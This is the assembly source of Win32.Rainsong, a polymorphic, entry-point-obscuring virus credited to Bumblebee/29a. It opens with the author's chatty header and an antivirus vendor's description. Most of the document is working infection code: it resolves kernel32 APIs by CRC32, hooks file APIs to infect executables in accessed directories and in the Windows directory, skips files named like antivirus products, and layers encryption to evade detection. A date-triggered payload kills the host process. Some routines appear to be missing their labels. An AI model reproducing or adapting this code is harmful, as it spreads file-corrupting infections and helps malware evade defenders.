;                                                  ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
;                                                  ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
;     The Rain Song                                 ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
;     Coded by Bumblebee/29a                       ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
;                                                  ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;   . The best way to  code a virus: listening  Led Zeppelin  (i'm  not so
;   old, but the best is ever good ;). And in the time  i was  coding this
;   bug i became  hooked again by  the Dr. Asimov.  'Pelude to Foundation'
;   it's the book. Here in  spain the books are going even more expensive,
;   but there are  cheap editions  of Asimov's work  (about  6 Euros). The
;   name of the  virus is from the amazing  song by  Led Zeppelin, of coz.
;   But the payload is a little tribute to Isaac Asimov. Very little.
;   This virus triggers its payload in the death date of Asimov.
;   May be you're interested in sci-fi, or just looking for a good book to
;   evade yourself from reality, there  are some titles i love (this could
;   be a nice order to read them):
;   Basics about the Foundation:
;       Foundation
;       Foundation and Empire
;       Second Foundation
;   This books could be readed before or after the basics:
;       Prelude to Foundation
;       Forward the Foundation
;   It's true the titles say nothing about the book contents. hehehe. This
;   is Asimov ;) I  feel you'll like them. Books made me be a bit as i am.
;   There is nothing that makes you more  as you are that those things you
;   choose to ignore. Hey! take that ;)
;   . This is my first per-process virus and also my first virus with EPO.
;   Don't spect too much of it. It isn't anything you haven't seen before,
;   but with  Bumblebee style. May be you're thinking in this way asm32 is
;   going  more  and more  close to macro  coding (hi ya urgo32!). I'm not
;   here for the money ;) Only  for fun. And  fun is not  ever innovate...
;   If you think this virus is worth less releasing let me know!
;   . This is the source  code of a VIRUS. The author  is not responsabile
;   of any  damage that  may occur  due to the assembly of this file.  Use
;   it at your own risk.
;   . Works under win32 systems:
;                               Windows 9x
;                               Windows Nt
;                               Windows 2000
;                               Future versions?
;   . Uses SEH during  scan kernel process. If the virus gets control from
;   EPO i test 1st for the last used address and if fails i test using the
;   Win9x, WinNt and Win2k fixed  kernel addresses. In this case  it could
;   not work in future versions of win32. But if i can rely in the stack i
;   hope it will work also if the kernel changes its address.
;   . Gets needed  API scanning kernel32.dll in memory using CRC32 instead
;   of names.
;   . Infects PE files increasing last section.
;   . Increases virtual size the amount of bytes needed to have memory for
;   temporary data. (virt size>phys size)
;   . Takes care of relocations in execution time.
;   . Uses size padding as infection sign.
;   . Avoids infect most used AV.
;   . Per-process resident hooking:
;                               CreateFileA
;                               MoveFileA
;                               CopyFileA
;                               CreateProcessA
;                               SetFileAttributesA
;                               GetFileAttributesA
;                               SearchPathA
;   . Gets  the path from  the hooked  calls to the APIs  and infects  the
;   files found in the directory.
;   . Has a runtime part that infects files in windows directory.
;   . Infects PE with the extension EXE and SCR.
;   . It has 2 layers of encryption. First polymorphic and second a simple
;   not loop. This is due  to 1st layer uses  32 bits key and i don't want
;   bytes unencrypted.
;   . Has  EPO (Entry Point Obscuring) tech patching a  call into the code
;   section of the  infected  program. Supports also the more standard way
;   of patching  PE header, but  avoids it if possible  trying to do light
;   EPO adding a jmp to the virus at the end of the original code section.
;   Win32.Rainsong 
;This is a dangerous per-process memory resident parasitic polymorphic
;Win32 virus. It searches for PE EXE files (Windows executable files) in
;Windows directory and infects them. Then it stays in Windows memory as a
;component of host application and affects PE EXE files that are accessed
;by host application.
;While infecting the virus writes itself to the end of the file by increasing
;the size of last file section. The virus uses "Entry Point Obscuring" methods
;and while infecting it does not modify program's entry address. To receive
;control when infected program is run, the virus scans victim file body, looks
;for a CALL command and replaces it with "JUMP VirusEntry" code. As a result
;the virus gets control not immediately at infected file start, but only in
;case the patched file code receives control.
;The virus has a bug and often corrupt files while infecting them.
;[This is true due i don't check if the import section has write attributes]
;[RainSong will corrupt all the windows file in win98 se :(]
;The virus avoids several anti-virus files infection, it detects them by two
;first letters in file name: AV*, AN*, DR*, ID*, OD*, TB*, F-*.
;[They NEVER analize the algo!!! A file called ?????AV.??? is never infected]
;[Why they insist in the 'two fist letters' shit?]
;On April 6th it generates Windows error message with the text:
;ASIMOV Jan.2.1920 - Apr.6.1992
;The virus also contains the text:
;< The Rain Song Coded By Bumblebee/29a > 
;   The source is commented so... have fun!
;   After i've released it i've found 2 little bugs :(
;   But don't worry, it work fine. See comments.
;                                                       The way of the bee
.model flat,STDCALL

        extrn           ExitProcess:PROC        ; needed for 1st generation

        vSize           equ     vEnd-vBegin
        crptSize        equ     crptEND-crptINI
        PADDING         equ     101
        STRINGTOP       equ     160

; from BC++ Win32 API on-line Reference
WIN32_FIND_DATA         struc
dwFileAttributes        dd      0
dwLowDateTime0          dd      ?       ; creation
dwHigDateTime0          dd      ?
dwLowDateTime1          dd      ?       ; last access
dwHigDateTime1          dd      ?
dwLowDateTime2          dd      ?       ; last write
dwHigDateTime2          dd      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved              dd      0,0
cFileName               db      260 dup(0)
cAlternateFilename      db      14 dup(0)
                        db      2 dup(0)
WIN32_FIND_DATA         ends

        ; dummy data
        db      'WARNING - This is a virus carrier - WARNING'

vBegin  label   byte
        ; call for the polymorphic decryptor
        call    crypt

crptINI label byte
        ; a lame 2nd layer
        call    secondLayerDecrypt
crptSecondINI label byte

        ; to store the return to host address
        push    offset fakeHost
hostRET equ     $-4
        ; to support relocs
        push    offset inicio
virusEP equ     $-4

        ; get delta offset
        call    getDelta

        ; setup relocations
        pop     eax                             ; get stored virus EP
        lea     edx,inicio+ebp                  ; get current
        sub     edx,eax                         ; calc displacement
        add     dword ptr [esp+20h],edx         ; fix hostRET
        add     dword ptr [imageBase+ebp],edx   ; fix image base

        ; Get Kernel32 address
        ; 1st check if we are in a EPO address
        mov     eax,dword ptr [EPOAddr+ebp]
        or      eax,eax
        jz      getK32notEPO

        ; we canot rely on stack... try some addresses
        mov     esi,dword ptr [kernel32+ebp]    ; test latest
        inc     esi
        call    GetKernel32
        jnc     getAPIsNow

        mov     esi,077e00001h                  ; test for win2k
        call    GetKernel32
        jnc     getAPIsNow

        mov     esi,077f00001h                  ; test for winNt
        call    GetKernel32
        jnc     getAPIsNow

        mov     esi,0bff70001h                  ; test for win9x
        call    GetKernel32
        jc      returnHost
        jmp     getAPIsNow

        ; use the value in the stack
        mov     esi,dword ptr [esp+24h]
        call    GetKernel32
        jc      tryFix

        ; now get APIs using CRC32
        mov     edi,12345678h
kernel32        equ $-4
        mov     esi,edi
        mov     esi,dword ptr [esi+3ch]
        add     esi,edi
        mov     esi,dword ptr [esi+78h]
        add     esi,edi
        add     esi,1ch

        add     eax,edi
        mov     dword ptr [address+ebp],eax
        add     eax,edi
        mov     dword ptr [names+ebp],eax
        add     eax,edi
        mov     dword ptr [ordinals+ebp],eax

        sub     esi,16
        mov     dword ptr [nexports+ebp],eax

        xor     edx,edx
        mov     dword ptr [expcount+ebp],edx
        lea     eax,FSTAPI+ebp

        mov     esi,dword ptr [names+ebp]
        add     esi,edx
        mov     esi,dword ptr [esi]
        add     esi,edi
        push    eax edx edi
        xor     edi,edi
        movzx   di,byte ptr [eax+4]
        call    CRC32
        xchg    ebx,eax
        pop     edi edx eax
        cmp     ebx,dword ptr [eax]
        je      fFound
        add     edx,4
        inc     dword ptr [expcount+ebp]
        push    edx
        mov     edx,dword ptr [expcount+ebp]
        cmp     dword ptr [nexports+ebp],edx
        pop     edx
        je      returnHost
        jmp     searchl
        shr     edx,1
        add     edx,dword ptr [ordinals+ebp]
        xor     ebx,ebx
        mov     bx,word ptr [edx]
        shl     ebx,2
        add     ebx,dword ptr [address+ebp]
        mov     ecx,dword ptr [ebx]
        add     ecx,edi

        mov     dword ptr [eax+5],ecx
        add     eax,9
        xor     edx,edx
        mov     dword ptr [expcount+ebp],edx
        lea     ecx,ENDAPI+ebp
        cmp     eax,ecx
        jb      searchl

        ; we must make a memory copy of the virus and work there
        ; the original copy it's patched to return host.
        ; This is necessary due we could be called from a call more
        ; than once... just think what happens when you decrypt twice...
        push    00000040h
        push    00001000h OR 00002000h
        push    (vSize+1000h)
        push    0h
        call    dword ptr [_VirtualAlloc+ebp]
        or      eax,eax
        jz      returnHost

        lea     esi,inicio+ebp
        mov     edi,eax
        mov     ecx,vSize
        rep     movsb
        lea     esi,hostRET-1
        lea     edi,inicio+ebp
        mov     ecx,5
        rep     movsb
        mov     byte ptr [edi],0c3h
        add     eax,offset memCopy-offset inicio
        push    eax

        ; get delta offset another time
        call    getDelta

        lea     edx,fileSize+ebp                ; check for Asimov
        push    edx                             ; death date
        call    dword ptr [_GetSystemTime+ebp]

        lea     edx,fileSize+ebp
        cmp     word ptr [edx+2],4
        jne     skipPay
        cmp     word ptr [edx+6],6
        jne     skipPay

        lea     edx,message+ebp
        push    edx
        xor     eax,eax
        push    eax
        call    dword ptr [_FatalAppExitA+ebp]   ; bye bye ;)

        ; alloc a temporary buffer to generate the poly sample
        ; of the virus ready to infect
        push    00000004h
        push    00001000h OR 00002000h
        push    (vSize+1000h)
        push    0h
        call    dword ptr [_VirtualAlloc+ebp]
        or      eax,eax
        jz      returnHost

        mov     dword ptr [memHnd+ebp],eax

        ; the same polymorphic routine is used for each infection
        ; in the current execution of the virus
        call    dword ptr [_GetTickCount+ebp]
        mov     edi,dword ptr [memHnd+ebp]
        add     edi,vSize
        mov     ecx,(crptSize/4)-(4-(crptSize MOD 4))
        call    GenDCrpt
        ; store the size of the sample (for infection process)
        ; and calc the virtual size
        mov     dword ptr [virtsize+ebp],vSize
        cmp     eax,BUFFERSIZE
        jb      decryptorSmall
        add     dword ptr [virtsize+ebp],eax
        jmp     virtSizeOk
        add     dword ptr [virtsize+ebp],BUFFERSIZE
        add     eax,vSize
        mov     dword ptr [gensize+ebp],eax

        ; Hook the API to get per-process residency
        ; Notice this must be called before any infection
        call    hookApi

        lea     esi,stringBuffer+ebp            ; get current directory
        push    esi
        push    STRINGTOP
        call    dword ptr [_GetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      returnHost

        push    STRINGTOP                       ; get windows directory
        lea     esi,tmpPath+ebp
        push    esi
        call    dword ptr [_GetWindowsDirectoryA+ebp]
        or      eax,eax
        jz      returnHost

        lea     esi,tmpPath+ebp                 ; goto windows directory
        push    esi
        call    dword ptr [_SetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      returnHost

        call    infectDir                       ; infect!! buahahahah!
                                                ; estoooo
        lea     esi,stringBuffer+ebp            ; go back home ;)
        push    esi
        call    dword ptr [_SetCurrentDirectoryA+ebp]

; Returns Delta offset into ebp.
        call    delta
        pop     ebp
        sub     ebp,offset delta
; General hook. This routine is for all the hooks.
; We have into esi the path to analize, the address of the
; original API in the stack (plus a pushad) and the delta
; offset into ebp. I use a semaphore 'cause the virus doesn't support
; multithread. In case hooked API is called by other thread while
; the virus is in the infection process could be fatal. I'm not sure
; 100% this is necessary but... ;)
        ; set sem to working
        mov     byte ptr [semHook+ebp],1

        call    stringUp
        jc      hookInfectionFail

        push    edi
        lea     edx,stringBuffer+ebp
        push    edx
        call    dword ptr [_GetFileAttributesA+ebp]
        pop     edi
        inc     eax
        jz      hookInfectionFail
        dec     eax

        and     eax,00000010h                   ; it's a directory?
        jnz     infectPath

        lea     edx,stringBuffer+ebp
        cmp     word ptr [edx+1],'\:'           ; absolute path?
        je      getPath

        cmp     word ptr [edx],'\\'             ; absolute path?
        jne     infectCurrent

        ; if it's an absolute path to a file we quit the
        ; filename and try the directory
        cmp     byte ptr [edi],'\'
        je      pathOk
        dec     edi
        cmp     edx,edi
        je      hookInfectionFail
        jmp     getPath

        mov     dword ptr [edi],0               ; now we have a path

        ; infects the path changing directory
        ; get current directory
        lea     esi,tmpPath+ebp
        push    esi
        push    STRINGTOP
        call    dword ptr [_GetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      hookInfectionFail

        ; set current directory to path
        lea     esi,stringBuffer+ebp
        push    esi
        call    dword ptr [_SetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      hookInfectionFail

        call    infectDir

        ; restore current directory
        lea     esi,tmpPath+ebp
        push    esi
        call    dword ptr [_SetCurrentDirectoryA+ebp]

        jmp     hookInfectionFail

        ; infects current directory 'cause we haven't any path
        ; to check (and the accessed file it's just there!)
        call    infectDir

        ; set sem to free
        mov     byte ptr [semHook+ebp],0
; Nice macro ;)
@hook   macro   ApiAddress
        push    eax
        call    getDelta
        mov     eax,dword ptr [ApiAddress+ebp]
        mov     dword ptr [esp+20h],eax
        mov     esi,dword ptr [esp+28h]

        or      esi,esi                         ; skip NULLs in filename
        jz      @@skipThisCall

        cmp     byte ptr [semHook+ebp],0
        je      generalHook
; The hooks.
      @hook     _CreateFileA
      @hook     _MoveFileA
      @hook     _CopyFileA
      @hook     _CreateProcessA
      @hook     _SetFileAttributesA
      @hook     _GetFileAttributesA
      @hook     _SearchPathA
Hook7:                                  ; this data it's included but
      @hook     _SetCurrentDirectoryA   ; not used... ops
                                        ; i can remove it, but better it
                                        ; fits the released binary
                                        ; i realized this bug after release
; This routine hooks the API that gives the virus per-process residency.
; The image base address is stored in the infection process.
        ; init the sem to free
        mov     byte ptr [semHook+ebp],0
        mov     edx,400000h
imageBase       equ $-4
        cmp     word ptr [edx],'ZM'
        jne     noHook
        mov     edi,edx
        add     edi,dword ptr [edx+3ch]
        cmp     word ptr [edi],'EP'
        jne     noHook
        mov     edi,dword ptr [edi+80h]         ; RVA import
        add     edi,edx
        mov     esi,dword ptr [edi+0ch]         ; get name
        or      esi,esi
        jz      noHook
        add     esi,edx
        push    edi                             ; save (stringUp doesn't)
        call    stringUp
        pop     edi
        jc      nextName
        lea     esi,stringBuffer+ebp
        cmp     dword ptr [esi],'NREK'          ; look for Kernel32 module
        jne     nextName
        cmp     dword ptr [esi+4],'23LE'
        je      k32ImpFound
        add     edi,14h
        mov     esi,dword ptr [edi]
        or      esi,esi
        jz      noHook
        jmp     searchK32Imp
        mov     esi,dword ptr [edi+10h]         ; get address table
        or      esi,esi
        jz      noHook
        add     esi,edx
        lea     ecx,HOOKTABLEEND+ebp
nextImp:                                        ; search for APIs
        lea     edx,HOOKTABLEBEGIN+ebp
        or      eax,eax
        jz      noHook
        mov     edi,dword ptr [edx]
        cmp     eax,dword ptr [edi+ebp]
        je      doHook
        add     edx,8
        cmp     edx,ecx
        jne     checkNextAPI
        jmp     nextImp
        mov     eax,dword ptr [edx+4]
        add     eax,ebp
        mov     dword ptr [esi-4],eax
        add     edx,8
        cmp     edx,ecx
        jne     nextImp
; Changes to upper case the string by esi storing into stringBuffer.
; Sets carry flag if our string buffer is small. Returns in edi the
; end of the string into the buffer. Requires SEH.
        push    esi eax
        lea     edi,stringBuffer+ebp
        mov     eax,edi
        add     eax,STRINGTOP
        cmp     eax,edi
        jne     continueStringUp
        jmp     stringUpOut
        cmp     byte ptr [esi-1],'a'
        jb      skipThisChar
        cmp     byte ptr [esi-1],'z'
        ja      skipThisChar
        add     byte ptr [edi-1],'A'-'a'
        cmp     byte ptr [esi-1],0
        jne     stringUpLoop
        dec     edi
        pop     eax esi
; This routine gets Kernel32 address. Uses SEH.
; The main purpose of this routine is search for the k32 address using
; a 'guess' address from the stack. But i cannot rely on the stack when
; the virus starts from EPO. Look the pieze of code that calls this
; routine to see how to fix it easily.
; Take a look to the article by Lethal Mind/29a from 29a#4 for more
; information about this method.
        xor     edx,edx
        lea     eax,dword ptr [esp-8h]
        xchg    eax,dword ptr fs:[edx]
        lea     edi,GetKernel32Exception+ebp
        push    edi
        push    eax

        dec     esi
        cmp     word ptr [esi],'ZM'             ; 'poda' -> this makes algo
        jne     GetKernel32Loop                 ; faster
        mov     dx,word ptr [esi+3ch]
        test    dx,0f800h
        jnz     GetKernel32Loop
        cmp     esi,dword ptr [esi+edx+34h]
        jne     GetKernel32Loop
        mov     dword ptr [kernel32+ebp],esi

        xor     edi,edi
        pop     dword ptr fs:[edi]
        pop     eax

        xor     edi,edi
        mov     eax,dword ptr fs:[edi]
        mov     esp,dword ptr [eax]
        xor     edi,edi
        pop     dword ptr fs:[edi]
        pop     eax
; This routine makes CRC32.
        xor     ecx,ecx
        dec     ecx
	mov     edx,ecx
	push    ebx
	xor     eax,eax
	xor     ebx,ebx
	xor     al,cl
	mov     cl,ch
	mov     ch,dl
	mov     dl,dh
	mov     dh,8
	shr     bx,1
	rcr     ax,1
	jnc     NoCRC
	xor     ax,08320h
	xor     bx,0EDB8h
        dec     dh
	jnz     NextBitCRC
	xor     ecx,eax
	xor     edx,ebx
        dec     edi
	jnz     NextByteCRC
	pop     ebx
	not     edx
	not     ecx
	mov     eax,edx
	rol     eax,16
	mov     ax,cx
; Updates the virus sample ready to infect in our memory buffer.
        lea     esi,vBegin+ebp
        mov     edi,dword ptr [memHnd+ebp]
        mov     ecx,vSize
        rep     movsb

        mov     ecx,crptSecondEND-crptSecondINI
        mov     esi,crptSecondINI-vBegin
        add     esi,dword ptr [memHnd+ebp]
        not     byte ptr [esi]
        inc     esi
        loop    secondEnLayerLoop

        mov     ecx,dword ptr [CodeSize+ebp]
        mov     esi,crptINI-vBegin
        add     esi,dword ptr [memHnd+ebp]
        mov     eax,dword ptr [CrptKey+ebp]
        xor     dword ptr [esi],eax
        add     esi,4
        loop    encrptLoop
; Infects PE file increasing last section.
; ESI: addr of file name of PE to infect.
        mov     dword ptr [fNameAddr+ebp],esi

        push    esi
        push    esi
        call    dword ptr [_GetFileAttributesA+ebp]
        pop     esi
        inc     eax
        jz      infectionError
        dec     eax

        mov     dword ptr [fileAttrib+ebp],eax

        push    esi
        push    00000080h
        push    esi
        call    dword ptr [_SetFileAttributesA+ebp]
        pop     esi
        or      eax,eax
        jz      infectionError

        xor     eax,eax
        push    eax
        push    00000080h
        push    00000003h
        push    eax
        push    eax
        push    80000000h OR 40000000h
        push    esi
        call    dword ptr [_CreateFileA+ebp]
        inc     eax
        jz      infectionErrorAttrib
        dec     eax

        mov     dword ptr [fHnd+ebp],eax

        push    0h
        push    eax
        call    dword ptr [_GetFileSize+ebp]
        inc     eax
        jz      infectionErrorClose
        dec     eax

        mov     dword ptr [fileSize+ebp],eax

        lea     edi,fileTime2+ebp
        push    edi
        lea     edi,fileTime1+ebp
        push    edi
        lea     edi,fileTime0+ebp
        push    edi
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_GetFileTime+ebp]
        or      eax,eax
        jz      infectionErrorClose

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    00000004h
        push    eax
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CreateFileMappingA+ebp]
        or      eax,eax
        jz      infectionErrorClose

        mov     dword ptr [fhmap+ebp],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    00000004h OR 00000002h
        push    dword ptr [fhmap+ebp]
        call    dword ptr [_MapViewOfFile+ebp]
        or      eax,eax
        jz      infectionErrorCloseMap

        mov     dword ptr [mapMem+ebp],eax

        mov     edi,eax
        cmp     word ptr [edi],'ZM'
        jne     infectionErrorCloseUnmap

        add     edi,dword ptr [edi+3ch]
        cmp     eax,edi
        ja      infectionErrorCloseUnmap        ; avoid fucking headers
        add     eax,dword ptr [fileSize+ebp]
        cmp     eax,edi
        jb      infectionErrorCloseUnmap        ; avoid fucking headers
        cmp     word ptr [edi],'EP'
        jne     infectionErrorCloseUnmap

        mov     edx,dword ptr [edi+16h]         ; test it's a valid PE
        test    edx,2h                          ; i want executable
        jz      infectionErrorCloseUnmap
        and     edx,2000h                       ; i don't want DLL
        jnz     infectionErrorCloseUnmap
        mov     dx,word ptr [edi+5ch]
        dec     edx                             ; i don't want NATIVE
        jz      infectionErrorCloseUnmap

        mov     edx,edi

        mov     esi,edi
        mov     eax,18h
        add     ax,word ptr [edi+14h]
        add     edi,eax
        mov     dword ptr [fstSec+ebp],edi

        push    edx
        mov     cx,word ptr [esi+06h]
        mov     ax,28h
        dec     cx
        mul     cx
        add     edi,eax
        pop     edx

        test    dword ptr [edi+24h],10000000h   ; avoid this kind of section
        jnz     infectionErrorCloseUnmap        ; we can corrupt it!

        test    dword ptr [edi+24h],0e0000020h  ; mmm... This is infected yet
        jz      infectionErrorCloseUnmap        ; another bug! must be jnz

        mov     eax,dword ptr [edi+10h]         ; i rely on the headers...
        add     eax,dword ptr [edi+14h]
        mov     dword ptr [fileSize+ebp],eax

        sub     eax,dword ptr [edi+14h]         ; calc our RVA
        add     eax,dword ptr [edi+0ch]
        mov     dword ptr [myRVA+ebp],eax
        ; save virus entry point to calc relocations in
        ; execution time
        add     eax,dword ptr [esi+34h]
        mov     dword ptr [virusEP+ebp],eax

        mov     eax,dword ptr [edi+08h]         ; fix the virtual size
        push    edx                             ; if needed
        mov     ecx,dword ptr [edx+38h]         ; some PE have strange
        xor     edx,edx                         ; virt size (cdplayer p.e.)
        div     ecx
        inc     eax
        or      edx,edx
        jz      rvaFixDone
        xor     edx,edx
        mul     ecx

        mov     dword ptr [edi+08h],eax         ; save the fixed virt size

        ; save image base for hook API
        mov     edx,dword ptr [esi+34h]
        mov     dword ptr [imageBase+ebp],edx
        pop     edx

        call    searchEPO                       ; Search for a call
        jc      notEPO

        push    edi edx ecx                     ; patch the call
        mov     edx,dword ptr [myRVA+ebp]
        add     edx,dword ptr [esi+34h]         ; edx = dest rva
        mov     edi,dword ptr [EPORva+ebp]
        add     edi,dword ptr [esi+34h]         ; edi = call rva
        sub     edx,edi
        sub     edx,5                           ; edx patch the call
        mov     ecx,dword ptr [EPOAddr+ebp]
        xchg    dword ptr [ecx+1],edx
        add     edx,edi                         ; get the rva
        add     edx,5
        mov     dword ptr [hostRET+ebp],edx     ; and store it ;)
        pop     ecx edx edi

        jmp     yeahEPO
        call    lightEPO                        ; try light EPO
        jc      notNotEPO

        push    edx ecx                         ; add the jump
        mov     ecx,dword ptr [myRVA+ebp]
        add     ecx,dword ptr [esi+34h]         ; ecx = dest rva
        mov     edx,dword ptr [EPORva+ebp]
        mov     dword ptr [myRVA+ebp],edx
        add     edx,dword ptr [esi+34h]         ; edx = jmp rva
        sub     ecx,edx
        sub     ecx,5                           ; ecx the addr jmp
        mov     edx,dword ptr [EPOAddr+ebp]
        mov     byte ptr [edx],0e9h
        mov     dword ptr [edx+1],ecx
        pop     ecx edx
        ; now lets the header be patched with this data ;)

        ; if i can't found a nice call to patch and i can't add
        ; a jump in the end of the code section i use the non-EPO
        ; infection. This could be a problem for the wild time 
        ; of the virus 'cause heuristics can fake it easily
        ; but we want to be infectious ;)
        push    edi                             ; store new ep and get old
        mov     edi,dword ptr [myRVA+ebp]       ; set edi=new ep
        mov     dword ptr [EPOAddr+ebp],0       ; getk32 changes if epo!

        xchg    edi,dword ptr [esi+28h]         ; get host EP and set new
        add     edi,dword ptr [esi+34h]
        mov     dword ptr [hostRET+ebp],edi     ; save it
        pop     edi
        push    edx                             ; calc the new virtual size
        mov     eax,dword ptr [virtsize+ebp]    ; for the section
        mov     ecx,dword ptr [edx+38h]
        xor     edx,edx
        div     ecx
        inc     eax
        xor     edx,edx
        mul     ecx
        pop     edx

        add     dword ptr [edi+08h],eax         ; fix the virtual size
        add     dword ptr [edx+50h],eax         ; fix the image size

        or      dword ptr [edi+24h],0e0000020h  ; set the properties

        push    edx                             ; calc new size for
        mov     eax,dword ptr [gensize+ebp]     ; the section
        mov     ecx,dword ptr [edx+3ch]
        xor     edx,edx
        div     ecx
        inc     eax
        xor     edx,edx
        mul     ecx
        pop     edx

        add     dword ptr [edi+10h],eax         ; store the phys size

        push    edx                             ; calc file padding
        mov     ecx,PADDING                     ; (infection sign)
        add     eax,dword ptr [fileSize+ebp]
        xor     edx,edx
        div     ecx
        inc     eax
        xor     edx,edx
        mul     ecx
        mov     dword ptr [pad+ebp],eax
        pop     edx

        ; update the virus sample ready to infect.
        call    updateVSample

        push    dword ptr [mapMem+ebp]
        call    dword ptr [_UnmapViewOfFile+ebp]

        push    dword ptr [fhmap+ebp]
        call    dword ptr [_CloseHandle+ebp]

        xor     eax,eax
        push    eax
        push    dword ptr [pad+ebp]
        push    eax
        push    00000004h
        push    eax
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CreateFileMappingA+ebp]
        or      eax,eax
        jz      infectionErrorClose

        mov     dword ptr [fhmap+ebp],eax

        xor     eax,eax
        push    dword ptr [pad+ebp]
        push    eax
        push    eax
        push    00000004h OR 00000002h
        push    dword ptr [fhmap+ebp]
        call    dword ptr [_MapViewOfFile+ebp]
        or      eax,eax
        jz      infectionErrorCloseMap

        mov     dword ptr [mapMem+ebp],eax

        mov     ecx,dword ptr [gensize+ebp]
        mov     esi,dword ptr [memHnd+ebp]
        mov     edi,eax
        add     edi,dword ptr [fileSize+ebp]
        rep     movsb

        xchg    ecx,eax                         ; Why i want the padding
        mov     eax,edi                         ; to be zeroes?
        sub     eax,ecx                         ; bah only one 'pijada'
        mov     ecx,dword ptr [pad+ebp]
        sub     ecx,eax
        xor     eax,eax
        rep     stosb

        push    dword ptr [mapMem+ebp]
        call    dword ptr [_UnmapViewOfFile+ebp]

        push    dword ptr [fhmap+ebp]
        call    dword ptr [_CloseHandle+ebp]

        lea     edi,fileTime2+ebp
        push    edi
        lea     edi,fileTime1+ebp
        push    edi
        lea     edi,fileTime0+ebp
        push    edi
        push    dword ptr [fHnd+ebp]
        call    dword ptr [_SetFileTime+ebp]

        push    dword ptr [fHnd+ebp]
        call    dword ptr [_CloseHandle+ebp]

        push    dword ptr [fileAttrib+ebp]
        push    dword ptr [fNameAddr+ebp]
        call    dword ptr [_SetFileAttributesA+ebp]


; This my 'search EPO' routine. Searches for a call into the code section
; that points to:
;      push     ebp
;      mov      ebp,esp
; This is the way the high level lenguages get the arguments used to call
; a procedure. If this code is found i assume the call found it's correct
; and i patch it to jump into the virus.
; I tested selecting the call randomly, but this is not needed. There
; could be calls that points the desired code and call that are not
; useful for the virus. Av cannot know wich is the call patched utill
; it finds it. Moreover using 1st found call i'm more sure that the virus
; will be executed! And this is good enought to fuck most cool heuristics.
        mov     edi,dword ptr [esi+28h]         ; get host EP

        xor     ecx,ecx
        mov     cx,word ptr [esi+06h]           ; number of sections
        mov     esi,dword ptr [fstSec+ebp]      ; get 1st section addr

sectionLoop:                                    ; look for code section
        mov     ebx,dword ptr [esi+0ch]
        add     ebx,dword ptr [esi+08h]         ; test it's inside this
        cmp     edi,ebx                         ; section
        jb      sectionFound
        add     esi,28h
        dec     ecx
        jnz     sectionLoop
        jmp     searchEPOOut

        test    dword ptr [esi+24h],10000000h   ; avoid this kind of section
        jnz     searchEPOFail                   ; we can corrupt it!

        push    esi
        sub     edi,dword ptr [esi+0ch]         ; get raw address
        add     edi,dword ptr [esi+14h]
        mov     ecx,dword ptr [esi+10h]
        cmp     ecx,edi
        jna     searchEPOFail
        sub     ecx,edi
        add     edi,dword ptr [mapMem+ebp]
        mov     ebx,edi
        add     ebx,ecx
        sub     ebx,10h                         ; high secure fence
callLoop:                                       ; loop that searches
        cmp     byte ptr [edi],0e8h             ; for the call
        jne     continueCallLoop
        mov     edx,edi
        add     edx,dword ptr [edi+1]
        add     edx,5
        cmp     ebx,edx
        jb      continueCallLoop
        cmp     edx,dword ptr [mapMem+ebp]
        jb      continueCallLoop
        mov     esi,edx
        mov     dx,word ptr [esi]
        cmp     dx,08b55h
        jne     continueCallLoop
        mov     dx,word ptr [esi+1]
        cmp     dx,0ec8bh
        jne     continueCallLoop
        mov     dword ptr [EPOAddr+ebp],edi
        sub     edi,dword ptr [mapMem+ebp]
        pop     esi
        add     edi,dword ptr [esi+0ch]         ; get rva address
        sub     edi,dword ptr [esi+14h]
        mov     dword ptr [EPORva+ebp],edi
        jmp     searchEPOOut
        inc     edi
        loop    callLoop
        pop     esi
; This makes a light EPO. Looks for space in the code section to
; put there a jump to virus code. The header is patched but this
; patch is less notorious. This EPO requires phys size of section
; bigger than virtual size + 5 (the size of the jump).
        mov     edi,dword ptr [esi+28h]         ; get host EP

        xor     ecx,ecx
        mov     cx,word ptr [esi+06h]           ; number of sections
        mov     esi,dword ptr [fstSec+ebp]      ; get 1st section addr

lightSectionLoop:                               ; look for code section
        mov     ebx,dword ptr [esi+0ch]
        add     ebx,dword ptr [esi+08h]         ; test it's inside this
        cmp     edi,ebx                         ; section
        jb      lightSectionFound
        add     esi,28h
        dec     ecx
        jnz     lightSectionLoop
        jmp     lightEPOOut

        test    dword ptr [esi+24h],10000000h   ; avoid this kind of section
        jnz     lightEPOFail                    ; we can corrupt it!

        mov     eax,dword ptr [esi+08h]         ; virtual size
        add     eax,5                           ; plus the code we add
        cmp     eax,dword ptr [esi+10h]         ; bigger than phys size?
        ja      lightEPOFail
        mov     edi,dword ptr [mapMem+ebp]      ; get raw address
        add     edi,dword ptr [esi+08h]
        add     edi,dword ptr [esi+14h]
        mov     dword ptr [esi+08h],eax         ; increase 5 bytes
        mov     dword ptr [EPOAddr+ebp],edi
        sub     edi,dword ptr [mapMem+ebp]
        add     edi,dword ptr [esi+0ch]         ; get rva address
        sub     edi,dword ptr [esi+14h]
        mov     dword ptr [EPORva+ebp],edi
; Infects PE files in current directory.

        lea     esi,find_data+ebp
        push    esi
        lea     esi,fndMask+ebp
        push    esi
        call    dword ptr [_FindFirstFileA+ebp]
        inc     eax
        jz      notFound
        dec     eax

        mov     dword ptr [findHnd+ebp],eax

        lea     esi,find_data.cFileName+ebp
        call    stringUp
        lea     esi,stringBuffer+ebp
        push    edi                             ; test the string it's
        sub     edi,esi                         ; long enought
        cmp     edi,5
        pop     edi
        jna     skipThisFile
        cmp     dword ptr [edi-4],'EXE.'
        je      validFileExt
        cmp     dword ptr [edi-4],'RCS.'
        jne     skipThisFile

